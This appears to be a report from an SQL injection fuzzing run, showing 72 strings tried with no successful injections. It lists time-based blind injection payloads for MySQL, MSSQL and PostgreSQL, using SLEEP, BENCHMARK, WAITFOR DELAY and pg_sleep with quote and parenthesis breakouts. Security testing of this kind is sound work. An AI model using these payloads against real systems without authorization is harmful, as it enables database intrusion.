----------------------------------------------
|          ------------------------          |
|          SQLi Fuzzer Conclusions:          |
|          ------------------------          |
|                                            |
|       Strings tried:                 72    |
|       Successfully Injected:         0     |
|       Made errors:                   3     |
|                                            |
|             Fuzzer parameters:             |
|             ------------------             |
|       Maximum Base string:           10    |
|       Maximum commands in string:    7     |
|                                            |
|      You can check the tested strings      |
|             in the full report             |
|             at:report_file.txt             |
----------------------------------------------

Successful Strings
------------------

Error Strings
-------------
1 or
') ; waitfor delay '0:0:5' --
" or SLEEP(2) &&

None Effective Strings
----------------------
1) or
1) or benchmark(10000000,MD5(1))
1) or benchmark(10000000,MD5(1)) #
1) or benchmark(10000000,MD5(1)) #
1) or benchmark(10000000,MD5(1)) #
1) or benchmark(10000000,MD5(1)) #
1) or benchmark(10000000,MD5(1)) #
1)) or
1)) or benchmark(10000000,MD5(1))
1)) or benchmark(10000000,MD5(1)) #
1)) or benchmark(10000000,MD5(1)) #
1)) or benchmark(10000000,MD5(1)) #
1)) or benchmark(10000000,MD5(1)) #
1)) or benchmark(10000000,MD5(1)) #
")) or
")) or benchmark(50000000,MD5(1))
")) or benchmark(50000000,MD5(1)) --
")) or benchmark(50000000,MD5(1)) --
")) or benchmark(50000000,MD5(1)) --
")) or benchmark(50000000,MD5(1)) --
")) or benchmark(50000000,MD5(1)) --
')) &&
')) && SLEEP(2)
')) && SLEEP(2) =
')) && SLEEP(2) = "
')) && SLEEP(2) = " )
')) && SLEEP(2) = " ) )
')) && SLEEP(2) = " ) ) or
') ;
') ; waitfor
') ; waitfor delay
') ; waitfor delay '0:0:5'
') ; waitfor delay '0:0:5' --
') ; waitfor delay '0:0:5' --
) ;
) ; waitfor
) ; waitfor delay
) ; waitfor delay '0:0:5'
) ; waitfor delay '0:0:5' --
) ; waitfor delay '0:0:5' --
) ; waitfor delay '0:0:5' --
1) or
1) or pg_sleep(2)
1) or pg_sleep(2) --
1) or pg_sleep(2) --
1) or pg_sleep(2) --
1) or pg_sleep(2) --
1) or pg_sleep(2) --
' or
' or pg_sleep(2)
' or pg_sleep(2) --
' or pg_sleep(2) --
' or pg_sleep(2) --
' or pg_sleep(2) --
' or pg_sleep(2) --
" or
" or SLEEP(2)
1 or
1 or sleep(2)
') ; waitfor delay '0:0:5' --
') ; waitfor delay '0:0:5' --
" or SLEEP(2) &&
" or SLEEP(2) && SLEEP(2)
1 or
1 or sleep(2)
') ; waitfor delay '0:0:5' --
') ; waitfor delay '0:0:5' --
" or SLEEP(2) &&
" or SLEEP(2) && '
